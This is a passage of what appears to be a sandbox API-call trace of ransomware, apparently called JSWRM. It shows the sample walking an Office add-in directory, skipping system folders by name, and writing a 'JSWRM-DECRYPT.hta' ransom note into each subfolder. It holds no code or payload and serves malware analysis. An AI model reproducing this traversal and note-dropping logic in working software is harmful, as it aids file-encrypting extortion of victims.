lpUsedDefaultChar=0x0) returned 36 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.386] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.386] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0123.386] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45c38, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sqmapi_x64.dll", cAlternateFileName="SQMAPI~1.DLL")) returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2=".") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="..") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="...") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="windows") returned -1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="recovery") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="perflogs") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="documents and settings") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="system volume information") returned -1 [0123.386] lstrcmpiW (lpString1="sqmapi_x64.dll", lpString2="msocache") returned 1 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi_x64.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi_x64.dll", cchWideChar=14, lpMultiByteStr=0x345e508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi_x64.dll", lpUsedDefaultChar=0x0) returned 14 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi_x64.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqmapi_x64.dll", cchWideChar=14, lpMultiByteStr=0x345e4d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqmapi_x64.dll", lpUsedDefaultChar=0x0) returned 14 [0123.386] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4cd5a2f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sr-Cyrl", cAlternateFileName="")) returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2=".") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="..") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="...") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="windows") returned -1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="recovery") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="perflogs") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="documents and settings") returned 1 [0123.386] lstrcmpiW (lpString1="sr-Cyrl", lpString2="$RECYCLE.BIN") returned 1 [0123.387] lstrcmpiW (lpString1="sr-Cyrl", lpString2="system volume information") returned -1 [0123.387] lstrcmpiW (lpString1="sr-Cyrl", lpString2="msocache") returned 1 [0123.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-cyrl\\jswrm-decrypt.hta")) returned 0xffffffff [0123.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-cyrl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.391] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.391] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.392] CloseHandle (hObject=0x338) returned 1 [0123.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Cyrl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-cyrl\\jswrm-decrypt.hta")) returned 0x20 [0123.392] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Cyrl\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0123.392] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.392] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.392] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.392] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.392] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4036427e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4036427e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.393] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.393] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ab054a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.393] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.393] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf05741b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf05741b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf05741b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.394] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cd5a2f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4cd5a2f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.394] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.394] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaaaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.394] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.395] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.395] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaaaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.395] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0123.395] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sr-Latn", cAlternateFileName="")) returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2=".") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="..") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="...") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="windows") returned -1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="recovery") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="perflogs") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="documents and settings") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="$RECYCLE.BIN") returned 1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="system volume information") returned -1 [0123.395] lstrcmpiW (lpString1="sr-Latn", lpString2="msocache") returned 1 [0123.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn\\jswrm-decrypt.hta")) returned 0xffffffff [0123.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.397] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 